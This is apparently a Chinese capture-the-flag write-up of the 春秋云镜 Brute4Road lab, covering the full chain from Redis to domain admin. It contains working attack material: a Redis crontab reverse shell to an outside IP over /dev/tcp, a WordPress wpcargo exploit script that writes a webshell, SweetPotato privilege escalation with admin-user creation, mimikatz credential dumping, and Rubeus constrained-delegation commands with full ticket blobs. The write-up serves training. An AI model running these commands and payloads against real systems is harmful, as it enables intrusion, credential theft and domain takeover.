春秋云镜-Brute4Road

flag01

信息搜集

image-20240820155943346

看到开放了6379端口,redis,很明显要打redis了

redid常见利用方式:

一.利用ssh_keygen登录服务器

条件:

1、Redis服务使用ROOT账号启动

2、服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。

二、利用计划任务反弹shell

条件:

root启用Redis

redis无密码或者弱密码

三、Redis直接写webshell

条件:

知道网站绝对路径,并且需要增删改查权限

root启动redis

redis弱密码或者无密码

四、Redis主从复制getshell

条件:

Redis 版本(4.x~5.0.5)(新增模块功能,可以通过C语言并编译出恶意.so文件)

redis弱密码或者无密码

root启动redis

五.结合SSRF进行利用

条件:

root启用redis

目标机存在dict协议

知道网站绝对路径

redis无密码或者弱密码

六、redis写lua

测试

尝试进行写反弹任务

1
2
3
4
5
6
redis-cli -h 192.168.33.134            #连接redis
flushall                           #清除所有键值
config set dir /var/spool/cron/crontabs/  #设置保存路径  
config set dbfilename shell               #保存名称
set xz "\n* * * * * bash -i >& /dev/tcp/101.34.80.152/9999 0>&1\n"     #将反弹shell写入xz键值
save                             #写入保存路径的shell文件

image-20240820161332345

测试过了没权限,尝试进行主从复制

这里使用redis-rogue-server获取rce

1
git clone https://github.com/n0b0dyCN/redis-rogue-server.git
1
python3 redis-rogue-server.py --rhost 39.99.133.63 --lhost 101.34.80.152 # lhost是你vps的地址

image-20240820162245658

image-20240820162257701

image-20240820162357305

image-20240820162404923

image-20240820162500230

发现base64拥有root权限,不多说了吧,直接利用

1
base64 "/home/redis/flag/flag01" |base64 --decode

image-20240820162659738

flag02

接下来要起代理了,上传frp fscan

先看看ip

最初的ifconfig不行了,有学到了新的

1
netstat -ano

image-20240820163302115

1
2
chmod 777 fscan
./fscan -h 172.22.2.1/24

image-20240820163420671

172.22.2.3 域机器

172.22.2.16 域机器

172.22.2.18 wordpress

发现了一个wordpress,先挂代理出来看看

用插件扫扫看

1
proxychains wpscan --url http://172.22.2.18

image-20240820164026419

发现相关插件漏洞

网上找到脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import sys
import binascii
import requests
# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):

    return '{:08b}'.format(c).replace('0', 'x')

text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://172.22.2.18/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.

requests.get(

    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)
# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(

    f"{destination_url}webshell.php?1=system", data={"2": cmd}

).content.decode('ascii', 'ignore'))

这里链接类型要改一下

image-20240820164406852

看到数据库配置

image-20240820164447655

wpuser

WpuserEha8Fgj9

蚁剑链接数据库,拿到flag

image-20240820164551088

flag03

发现一个很有趣的表,是哪来的提示呢?

image-20240820164605605

之前fscan扫到mssql

这里的Mima应该对应其密码,记得导出的时候把limit删了,拉下来后面爆破

image-20240820171001431

sa—- ElGNkOiC

链接上激活

上传我的小土豆,记得激活组件

image-20240820171614592

1
C:/Users/Public/sweetpotato.exe -a "netstat -ano"

image-20240820171744123

3389端口,连远桌

1
2
C:/Users/Public/sweetpotato.exe -a "net user aaa Q1ngchuan@ /add"
C:/Users/Public/sweetpotato.exe -a  "net localgroup administrators bbb /add" # 加到管理组

密码设置复杂一点,windows密码有基本要求的

链接找到flag

image-20240820172931472

flag04

下面就是域渗透了

信息搜集

执行命令systeminfo,发现域环境

image-20240820173220675

上猕猴桃

尝试进行DCsync命令,发现打不了,尝试抓取本地用户密码

管理员运行

1
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

image-20240820174640427

NTLM: c6f58ffaa5ae21240ef122eb09e47c76image-20240820174702014

MSSQLSERVER机器配置了到 DC LDAP 和 CIFS 服务的约束性委派

不怎么了解约束委派攻击,来学习一下

https://xz.aliyun.com/t/14417?time__1311=GqAxuWKCqDq0yqew4Yqo4fg4jxw%3DDgBeoD

Rubeus.exe下载链接(找了好几个都不行,

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe

首先通过Rubeus申请机器账户MSSQLSERVER的TGT,执行后,将得到 Base64 加密后的 TGT 票据

image-20240820181444265

1
2
3
.\Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:c6f58ffaa5ae21240ef122eb09e47c76 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt

.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE24zBpjW3nT+m8M8EFq+pklNIbGJ4NAh5i0gs/CEbGAao12nO+5nnynBvwVpiWGJVU2qhmKJn+J3U5J5lefRsvkgpbEf6lSeenAU1pQPvwPGBUm14QuRimv2n14JM0a2g8PhUH8Z6V8069RQHDfgbVEIDHtGNNriB6INo5Q6fvWR3XaGkCLLgfn3byi0SAfs7msaaYJdzF+muJZ2PNaa98jZwJxw+BYIrHeSr46Q3/dllxgcQ5LplxXDyh3ELCE7luoFMjgGl0u9wKHRc/fMqI8FKABxvlKFhl1vkdoDpbttrhVhybb3UbqtXThMOoNWcNLcUOdnz41/+eqP5P3mQz0OZz5Xjry/j2CSLpVuVqt0a4u/KjnoPLj/sBCRpTwc97JdCawqKpgHf+Mey7hGq1uQDQPwAi/0E4GMdjJlY+53tMFfiM1zFn+6dIdhjOCDaCE2jnHGrSSXKjfQtOQ46peSeTJev7U8Bvws+RPusCI1PcUO9hKh7aZuMWvoE1+/ikO8ObDAAW5hlvht0GJZu0LA1OnLx8vvdJBHUs6DGNKxNiWKjoDlIMZvQs6Gdkxt0a1GAuiM90TuiD9f1g0SvattwqQgDk3JFnbSfhsneCCC/KtcyrxGh110BCdVJIvAAil0hGyZpNnR3QxPQVE40lvJhMfz2dqDBCjOzA6ZIyB/D4/+mzIcP6Q28/y13jsOyIra8n5zovHf5EfLlRO5u0tjs6Pk75damT2gENgQI0d8NB1+fjv2Mo1gH+VcALN8bhE3Dsn8kZMYNPl4dDTNB3v5gTOta/IvDc5aguSUVawWQaJry98S9Ei+Nv7v84UNuG7Zf07nVzQzh2srjz9ZlP2hmIcaqUyt5EZO4/TKAkWdK967jvDOCWgg9ULA4vRgQR9d6pl+mv61cv8fAVoVBLKDm65TtJodDbBAnFZhahFLnXEtAFPBBCVbQV0GY/3+5gyYlENePu88Bgr/+tSFvmZdHnVkeCqeSK+3EYElPd3wV0T3b4vGHjOUvMWaUueD3bKgnZQ8a2UWFHguFS+CGCZi/dDiIqp6oZT+8CcpMAja1oQGvxeJCXqna2pqYELePbnHA6jAJv2tNFh1nku7kRFg0M5q4IpGmm1uD47jiX8Z73y2zxDNNZo10FdSWWtD2/Mob70CPF4TtKREh77ydqxfgWSsEybS6sXxvIjFCjsjinKV7Izs3FU9nLyKQSyhbbZLm5jxSDF0V2IKd7YgvMNMySGtcWmECG60z8X9fdWD1DbwFWyRldtif6W3J0+VZdCOR/zf+440YI9PcV/gkJiCBzSNmnlfn0RtpFbe8b3052joJAvE1JEZfEZ4Vf+p/amaQxIA8rZT+uIWJ6MoEXDaFI81/8G5A+cMBnkiioNUDriDd2OJB6XcUBpwPiTyUQI09RgXX/BZbPilmXlQ9poMkgWhG9sv68qEv07er/dN2gf7zWBCYixujmA/vajgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBAZ70HRRMeesCyNbiuS36CRoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI0MDgyMDAyMzEzMFqmERgPMjAyNDA4MjAxMjMxMzBapxEYDzIwMjQwODI3MDIzMTMwWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==
1
doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE1iWkXRrAPQR3ZxkDFCojVzXOq38EUr1JcnKIz+5vTMO+F/l5kiACfISQP7q2S6V6vxjJgfDP9S0fkzNu8/ml4M/jql5b5sKoW7xWZ+kJQGVrsKgBOuBWJRVZi3+k4VvKcFhhbCTddXDxHx+Su+ZIhiwXjW8k9UtbsNwcRm+DmwENCXTQOfqHLiN1sbZnL235UbxkaGgqAfBswZEouRdz3cxw6Hd7kQdnvTOXUtHeFRlSoHQoOhXFWCqchMRdRSC4uO5ZxIpO1N14Tcp+bfDgrDoA4Ay1uRd9fkJuxr5Wo7OiJI6xS1RcazWQJcEzyxVXMjw8W4T99cN07+16WodrwWlpWY6XejqnYPeqhZ9UsEBfvw1sxy38Igrnn111p5dTSaVLfM8yHa3kz1fZxpNlHHpraXQltWSwW7zfbb9B0b2+8kTeMU2zPraMc/VaNQJGrXy3e5LQ5ookPtWwA4oA4TcNHoabpMSg2IsfwLmVjoMsa+e68U+W/XomEmEgpEhLeEhvquUPgCBbKxFTMDA0jfs9emufo4bjeTtLIrjq8n0T7JT48Dhr2nqaB17Lsz5PhICI73JmD2lFt9R4OKMpzH9rA+/Kn2rbWaBzQWSZL2ss55L55zvlcXHzSIqo+WKxkG6W2KH9QC7vaQju2qY2LMs4WWwm+u/Mm/ItL3/Flcsl+F6QWrq1uCDhHkj6RN8+LPP37IwREjaojcv0IuWmP32DwMxO1vbr/BA01+pUknPNdhxRog1QnWr8wHIfIYNpbGIDpflQxf0Bh9FPAJtSlns5RGiv9U2hQHc4UI0MxACa816uS852KgJpWdQUOkJLh+2HS9QBsXsqB9lK9IJR56Y3UxLxWYVOJRIXWvbyxcSV7vK9wtygtOmHdsXsAajc/Ykj+XC35qSugPFwirjQr0DvRBHtO2qVFpxAplbB484q+tjoGGhSZmoblqYzJGVaujlYr6YHY5SKWRQVTt1KIxzaMJnEZtREb2ObBTCMbaWep2rT1FmXT4z/K9zMAgpY6PNbWyM3e87gn1jxQhd5qwJYd6R1fEK3VgYy8iUFB9y99cZGG5UuB3JF1IjTJjvTHPi/YQ+OGlW8hM6DldRl+Rz5ygCrS4FToJbWLhCB5YoDTEsQlTDs9UlDLQ40H3vAfPzezcOIVq1/tK7ayrHyvZsMq5+TRhXQ9x9jJkpJ1/cdodR73fqDP/s9k2KAuA+QrhYRr95yRdm5Sp+qcz3zPUVVZdRPRZjJBzC0phkpTXE2bsw7a6ivNKaTEP4j9DxUUwR1EAwzrohnZaFTrRNve2hYpgYXYywRA2YBVPwUVrPjiK5KOwAc0SyFBkBfBujj7x8s7cN27wdVZjO352jPzOgXOV7EH8rxN4tfsZxEV4hXNKLCSEgUaWyufbH9J2tZbJ1r1Jsyhx7U6EERWZZPF9wGSyOg8hT4/XB7loq4ABs2vM5iE5kAIoF1fD+76jgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBCD1S0krZ8bQ7eam8GT02vdoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI0MDgyMDEwMTQwM1qmERgPMjAyNDA4MjAyMDE0MDNapxEYDzIwMjQwODI3MTAxNDAzWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

image-20240820181206610

总结

这个靶机学到了新的查看网段ip的命令

1
netstat -ano

猕猴桃抓取明文密码和hash

1
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

攻击者如果能够获得配置了约束委派的服务账户的权限(例如获取密码或Hash)(猕猴桃就可以),就可以模拟域内任意用户(例如域管理员),并代表其获得对已配置服务的访问权限。

而MSSQLSERVER 配置了到 DC LDAP 和 CIFS 服务的约束性委派,用Rubeus申请自身的服务票据,用通过 S4U 伪造 ST,通过Rubeus的S4U2Self协议代表域管理员申请针对域控LDAP服务的票据并注入内存,便相当于我当前用户在模拟管理员,也就有了相关的权限。